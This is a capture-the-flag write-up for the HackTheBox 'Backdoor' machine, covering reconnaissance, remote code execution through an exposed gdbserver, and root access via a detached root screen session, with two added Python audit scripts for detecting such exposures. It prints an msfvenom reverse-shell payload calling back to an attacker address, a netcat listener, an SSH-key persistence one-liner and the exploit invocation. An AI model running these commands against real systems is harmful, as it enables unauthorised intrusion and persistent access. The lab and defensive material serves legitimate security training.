Summary

Technical writeup for the Backdoor Linux machine on HackTheBox. Access to a user account was obtained through an exposed GNU gdbserver. Privilege escalation was possible due to a misconfigured background console session left running under a high-privilege account.

Reconnaissance

Basic scans

First, nmap scans were performed for the full TCP port range and the top 200 UDP ports:

nmap -v -T4 -Pn -A -oA nmap_full_tcp -p 1-65535 10.10.11.125
nmap -v -T4 -Pn -sU --top-ports 200 10.10.11.125

The output revealed 3 TCP services listening on the target host:

Host is up (0.076s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_https-redirect: ERROR: Script execution failed (use -d to debug)
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service identification

22/tcp

Port 22/tcp was obviously an OpenSSH service, which might let the attacker access the machine once sufficient credentials were obtained from the server or a key was added to a user's authorized_keys file. At this point nothing could be done with this service.

80/tcp

Port 80/tcp was an Apache 2.4.41 web server hosting a WordPress instance in version 5.8.1. To begin with, the wpscan tool was used to check whether there were any obvious vulnerabilities in this instance:

wpscan --url http://10.10.11.125

The scan output, however, did not indicate any relevant findings:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Sat Mar 26 21:40:01 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-01-25T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups -: |=======================================================================|

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 26 21:40:09 2022
[+] Requests Done: 150
[+] Cached Requests: 36
[+] Data Sent: 37.157 KB
[+] Data Received: 17.975 MB
[+] Memory used: 238.348 MB
[+] Elapsed time: 00:00:07

1337/tcp

The last service was running on 1337/tcp, but nmap did not recognize it properly. An attempt to run amap did not reveal any results either:

amap -bqv 10.10.11.125 1337
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

amap v5.4 (www.thc.org/thc-amap) started at 2023-01-22 21:30:16 - APPLICATION MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...

After searching the web for exploits related to this port, the following exploit could be found: GNU gdbserver 9.2 - Remote Command Execution (RCE)
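Neither nmap nor amap classified the 1337/tcp listener, which is exactly the gap an exposure audit needs to close: a listener that speaks the GDB remote serial protocol (RSP) without authentication should be inventoried and firewalled. The following check is an added example written for this writeup (not part of the original text or of any tool it mentions); it sends the harmless qSupported query and classifies the reply, and the host and port are whatever the audit targets.

```python
"""Identify an unauthenticated GDB remote serial protocol (RSP) listener.

Added example for this writeup, not part of the original text. gdbserver
answers a 'qSupported' query with a feature list such as 'PacketSize=...',
which is enough to classify a listener that nmap and amap left unidentified.
"""
import socket

def checksum(payload):
    """RSP checksum: sum of the payload bytes modulo 256."""
    return sum(payload.encode()) % 256

def build_packet(payload):
    """Frame a payload as $<payload>#<two lowercase hex digits>."""
    return "${}#{:02x}".format(payload, checksum(payload)).encode()

def parse_packet(raw):
    """Return the payload of the first well-formed RSP packet in raw, or None
    if there is no packet or its checksum is wrong. A leading '+' (the peer's
    acknowledgement of our own packet) is skipped."""
    text = raw.decode(errors="replace")
    start = text.find("$")
    end = text.find("#", start)
    if start < 0 or end < 0 or len(text) < end + 3:
        return None
    payload = text[start + 1:end]
    try:
        claimed = int(text[end + 1:end + 3], 16)
    except ValueError:
        return None
    return payload if claimed == checksum(payload) else None

def classify(response):
    """Map a raw reply to qSupported onto an inventory verdict."""
    payload = parse_packet(response)
    if payload is None:
        return "not-gdb-rsp"
    if "PacketSize=" in payload:
        return "unauthenticated-gdbserver"
    return "gdb-rsp-unknown"

def probe(host, port, timeout=3.0):
    """Send qSupported to host:port and classify the reply (live network call)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_packet("qSupported"))
        try:
            data = s.recv(4096)
        except socket.timeout:
            return "no-response"
    return classify(data)
```

A verdict of unauthenticated-gdbserver means the debug stub accepts commands from any client that can reach the port, so the finding belongs in the exposure report regardless of what exploit is public for the version in use.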

User access

To use the exploit discovered for 1337/tcp, it was necessary to generate a reverse shell payload:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=1234 PrependFork=true -o rev.bin

That command generated reverse TCP shell shellcode for the x64 architecture, which was supposed to connect back to 10.10.16.5 on port 1234, so a corresponding listener had to be set up on the attacker's machine:

nc -nlvp 1234

Having both the payload and the reverse shell listener in place, the exploit could be run:

python3 ./50539.py 10.10.11.125:1337 rev.bin

This exploit gave a reverse shell with user rights and the user.txt flag.

Privilege escalation

Once a reverse shell was obtained, a new SSH key could be added with this one-liner:

mkdir -p ~/.ssh && echo "ssh-rsa YOUR_SSH_PUB_KEY" >> ~/.ssh/authorized_keys && chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys

so that it was more convenient to connect to the server over the SSH service.

During enumeration the following 2 processes appeared interesting:

root         962  0.0  0.1   6952  2308 ?        Ss   20:37   0:00 SCREEN -dmS root
root         963  0.0  0.2   8272  5108 pts/0    Ss+  20:37   0:00  _ -/bin/bash

This was a screen command running with the -dmS root attributes and having a /bin/bash process inside. After analysing the screen syntax it was clear that the -dm options start a detached session (named root by -S) that can be reattached later. The process was running as the root user, so it was possible to attach to it with the following command:

screen -x root/root

and obtain root access to the machine.
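The root cause here is a privileged detached session that a lower-privileged user could attach to. The following audit is an added example written for this writeup (not part of the original text); it lists screen sessions whose socket or per-user socket directory grants any group/other permission and reports whether the screen binary is setuid, the two conditions a reviewer would check first. The socket base directory /run/screen is an assumption (the location varies by distro), and the heuristic is a review aid, not a full reproduction of screen's own access checks.

```python
"""Audit GNU screen sessions that other local users might attach to.

Added example for this writeup, not from the original text. Screen keeps one
directory per user under its socket base, named S-<user>, holding one socket
per session (named <pid>.<session>). A session owned by a privileged user is
worth reviewing when that socket or directory is group/other accessible, or
when the screen binary is setuid, since either can let another user run
'screen -x <user>/<session>'.
"""
import os
import shutil
import stat

SCREEN_SOCKET_BASE = "/run/screen"  # assumption; some distros use /var/run/screen

def exposed_sessions(base=SCREEN_SOCKET_BASE):
    """Return [(owner_uid, user, session, mode)] for every session whose socket
    or per-user directory grants any permission bit to group or others."""
    found = []
    if not os.path.isdir(base):
        return found
    for entry in sorted(os.listdir(base)):
        if not entry.startswith("S-"):
            continue
        user_dir = os.path.join(base, entry)
        dir_mode = os.stat(user_dir).st_mode
        for session in sorted(os.listdir(user_dir)):
            st = os.stat(os.path.join(user_dir, session))
            # any group/other bit on either the directory or the socket
            if (dir_mode | st.st_mode) & 0o077:
                found.append((st.st_uid, entry[2:], session, oct(st.st_mode & 0o777)))
    return found

def screen_is_setuid(path=None):
    """True if the screen binary on PATH (or the given path) carries setuid."""
    path = path or shutil.which("screen")
    if not path:
        return False
    return bool(os.stat(path).st_mode & stat.S_ISUID)

if __name__ == "__main__":
    print("screen setuid:", screen_is_setuid())
    for uid, user, session, mode in exposed_sessions():
        print("uid={} user={} session={} mode={}".format(uid, user, session, mode))
```

Run it as root on the host under review; a root-owned session in the output, combined with a setuid screen, is the configuration this writeup abused, and the fix is to end the stray session and tighten the socket directory and binary permissions.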